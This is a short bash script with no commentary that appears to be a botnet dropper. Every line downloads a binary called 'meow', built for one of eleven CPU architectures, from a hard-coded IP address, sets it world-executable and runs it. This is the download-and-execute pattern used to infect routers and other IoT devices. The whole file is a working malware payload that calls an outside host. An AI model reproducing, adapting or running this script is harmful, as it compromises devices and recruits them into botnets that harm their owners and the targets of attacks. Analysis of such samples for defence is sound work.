#!/bin/bash
wget http://45.95.55.24/bins/meow.arm; chmod 777 meow.arm; ./meow.arm
wget http://45.95.55.24/bins/meow.arm5; chmod 777 meow.arm5; ./meow.arm5
wget http://45.95.55.24/bins/meow.arm6; chmod 777 meow.arm6; ./meow.arm6
wget http://45.95.55.24/bins/meow.arm7; chmod 777 meow.arm7; ./meow.arm7
wget http://45.95.55.24/bins/meow.m68k; chmod 777 meow.m68k; ./meow.m68k
wget http://45.95.55.24/bins/meow.mips; chmod 777 meow.mips; ./meow.mips
wget http://45.95.55.24/bins/meow.mpsl; chmod 777 meow.mpsl; ./meow.mpsl
wget http://45.95.55.24/bins/meow.ppc; chmod 777 meow.ppc; ./meow.ppc
wget http://45.95.55.24/bins/meow.sh4; chmod 777 meow.sh4; ./meow.sh4
wget http://45.95.55.24/bins/meow.spc; chmod 777 meow.spc; ./meow.spc
wget http://45.95.55.24/bins/meow.x86; chmod 777 meow.x86; ./meow.x86